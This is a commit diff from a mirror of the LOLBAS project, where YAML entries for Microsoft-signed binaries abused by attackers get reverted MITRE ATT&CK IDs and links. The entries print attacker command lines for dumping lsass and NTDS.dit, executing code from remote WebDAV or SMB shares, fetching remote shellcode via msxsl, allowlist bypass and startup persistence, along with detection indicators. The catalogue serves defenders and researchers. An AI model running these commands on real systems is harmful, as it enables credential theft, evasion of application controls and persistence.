public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-08-03 16:12:50 +02:00
Code Issues Projects Releases Wiki Activity

Revert "MITRE ATT&CK realignment sprint"

Browse Source
This commit is contained in:
bohops
2021-11-05 20:22:14 -04:00
committed by GitHub
parent 03362b8640
commit 61a3d97fad
159 changed files with 571 additions and 253 deletions
Download Patch File Download Diff File Expand all files Collapse all files

13
yml/OtherMSBinaries/Adplus.yml
View File

@@ -2,22 +2,23 @@
Name: adplus.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-09-01
Created: 1/9/2021
Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
MitreID: T1003
MitreLink: https://attack.mitre.org/techniques/T1003/
OperatingSystem: All Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Code_Sample:
- Code:
Detection:
- IOC:
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
Acknowledgement:

2
yml/OtherMSBinaries/Agentexecutor.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
@@ -17,6 +18,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension

5
yml/OtherMSBinaries/Appvlp.yml
View File

@@ -1,7 +1,7 @@
---
Name: Appvlp.exe
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: 'Oddvar Moe'
Author: ''
Created: 2018-05-25
Commands:
- Command: AppVLP.exe \\webdav\calc.bat
@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 w/Office 2016
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
@@ -17,6 +18,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 w/Office 2016
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
@@ -24,6 +26,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 w/Office 2016
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe

6
yml/OtherMSBinaries/Bginfo.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
@@ -17,6 +18,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@@ -24,6 +26,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@@ -31,6 +34,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@@ -38,6 +42,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@@ -45,6 +50,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: No fixed path

10
yml/OtherMSBinaries/Cdb.yml
View File

@@ -9,7 +9,8 @@ Commands:
Usecase: Local execution of assembly shellcode.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: |
cdb.exe -pd -pn <process_name>
@@ -18,7 +19,8 @@ Commands:
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
MitreID:
MitreLink:
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
@@ -32,11 +34,11 @@ Resources:
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
Acknowledgement:
Acknoledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: mr.d0x
Handle: '@mrd0x'
- Person: Spooky Sec
Handle: '@sec_spooky'
---
---

13
yml/OtherMSBinaries/Coregen.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1055
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
OperatingSystem: Windows
- Command: coregen.exe dummy_assembly_name
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
@@ -17,6 +18,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1055
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
OperatingSystem: Windows
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
@@ -24,12 +26,13 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Code_Sample:
- Code:
Code_Sample:
- Code:
Detection:
- IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
- IOC: coregen.exe loading .dll file not named coreclr.dll
@@ -41,9 +44,9 @@ Resources:
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
- Person: Nicky Tyrer
Handle:
Handle:
- Person: Evan Pena
Handle:
Handle:
- Person: Casey Erikson
Handle:
Handle:
---

3
yml/OtherMSBinaries/Csi.yml
View File

@@ -9,7 +9,8 @@ Commands:
Usecase: Local execution of unsigned C# code.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe

1
yml/OtherMSBinaries/DefaultPack.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\

6
yml/OtherMSBinaries/Devtoolslauncher.yml
View File

@@ -9,14 +9,16 @@ Commands:
Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with VS/VScode installed
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with VS/VScode installed
Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'

3
yml/OtherMSBinaries/Dnx.yml
View File

@@ -9,7 +9,8 @@ Commands:
Usecase: Local execution of C# project stored in consoleapp folder.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: N/A

3
yml/OtherMSBinaries/Dotnet.yml
View File

@@ -9,6 +9,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with .NET installed
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL.
@@ -16,12 +17,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with .NET installed
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 with .NET Core installed
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'

3
yml/OtherMSBinaries/Dxcap.yml
View File

@@ -9,7 +9,8 @@ Commands:
Usecase: Local execution of a process as a subprocess of Dxcap.exe
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: C:\Windows\System32\dxcap.exe

1
yml/OtherMSBinaries/Excel.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe

12
yml/OtherMSBinaries/Fsi.yml
View File

@@ -10,27 +10,29 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsi.exe
Description: Execute F# code via interactive command line
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Code_Sample:
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---
---

12
yml/OtherMSBinaries/FsiAnyCpu.yml
View File

@@ -10,25 +10,27 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---
---

6
yml/OtherMSBinaries/Mftrace.yml
View File

@@ -9,14 +9,16 @@ Commands:
Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86

2
yml/OtherMSBinaries/Msdeploy.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows server
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
@@ -17,6 +18,7 @@ Commands:
Category: AWL bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows server
Full_Path:
- Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe

4
yml/OtherMSBinaries/Msxsl.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).
@@ -17,6 +18,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
@@ -24,6 +26,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
@@ -31,6 +34,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path:

5
yml/OtherMSBinaries/Ntdsutil.yml
View File

@@ -1,6 +1,6 @@
---
Name: ntdsutil.exe
Description: Command line utility used to export Active Directory.
Description: Command line utility used to export Actove Directory.
Author: 'Tony Lambert'
Created: 2020-01-10
Commands:
@@ -9,7 +9,8 @@ Commands:
Usecase: Dumping of Active Directory NTDS.dit database
Category: Dump
Privileges: Administrator
MitreID: T1003.003
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows
Full_Path:
- Path: C:\Windows\System32\ntdsutil.exe

1
yml/OtherMSBinaries/Powerpnt.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe

7
yml/OtherMSBinaries/Procdump.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
@@ -17,14 +18,12 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
Detection:
Detection:
- IOC: Process creation with given '-md' parameter
- IOC: Anomalous child processes of procdump
- IOC: Unsigned DLL load via procdump.exe or procdump64.exe
Resources:
- Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
Acknowledgement:
- Name: Alfie Champion
Handle: '@ajpc500'
---

6
yml/OtherMSBinaries/Rcsi.yml
View File

@@ -9,14 +9,16 @@ Commands:
Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: AWL Bypass
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path:

19
yml/OtherMSBinaries/Remote.yml
View File

@@ -2,35 +2,38 @@
Name: Remote.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-06-01
Created: 1/6/2021
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
MitreID: T1127
MitreID:
MitreLink:
OperatingSystem:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
MitreID:
MitreLink:
OperatingSystem:
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
Privileges: User
MitreID: T1127
MitreID:
MitreLink:
OperatingSystem:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Code_Sample:
- Code:
Detection:
Code_Sample:
- Code:
Detection:
- IOC: remote.exe spawned
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

4
yml/OtherMSBinaries/Sqldumper.yml
View File

@@ -10,13 +10,15 @@ Commands:
Category: Dump
Privileges: Administrator
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows
- Command: sqldumper.exe 540 0 0x01100:40
Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
Category: Dump
Privileges: Administrator
MitreID: T1003.001
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe

1
yml/OtherMSBinaries/Sqlps.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe

1
yml/OtherMSBinaries/Sqltoolsps.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

5
yml/OtherMSBinaries/Squirrel.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -17,6 +18,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -24,6 +26,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --updateRoolback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -31,6 +34,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -38,6 +42,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'

3
yml/OtherMSBinaries/Te.yml
View File

@@ -9,7 +9,8 @@ Commands:
Usecase: Execute Visual Basic script stored in local Windows Script Component file.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path:

6
yml/OtherMSBinaries/Tracker.yml
View File

@@ -9,14 +9,16 @@ Commands:
Usecase: Injection of locally stored DLL file into target process.
Category: Execute
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
Category: AWL Bypass
Privileges: User
MitreID: T1127
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path:

13
yml/OtherMSBinaries/Update.yml
View File

@@ -10,6 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -17,6 +18,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -24,6 +26,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -31,6 +34,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -38,6 +42,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -45,6 +50,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -52,6 +58,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
@@ -59,6 +66,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -66,6 +74,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -73,6 +82,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
@@ -80,6 +90,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
@@ -87,6 +98,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1547
MitreLink: https://attack.mitre.org/techniques/T1547/001/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
@@ -94,6 +106,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1070
MitreLink: https://attack.mitre.org/techniques/T1070/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\update.exe'

5
yml/OtherMSBinaries/VSIISExeLauncher.yml
View File

@@ -10,16 +10,17 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 and up with VS/VScode installed
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:
- Code:
Detection:
Detection:
- IOC: VSIISExeLauncher.exe spawned an unknown process
Resources:
- Link: https://github.com/timwhitez
Acknowledgement:
- Person: timwhite
Handle:
Handle:
---

9
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
View File

@@ -10,14 +10,15 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
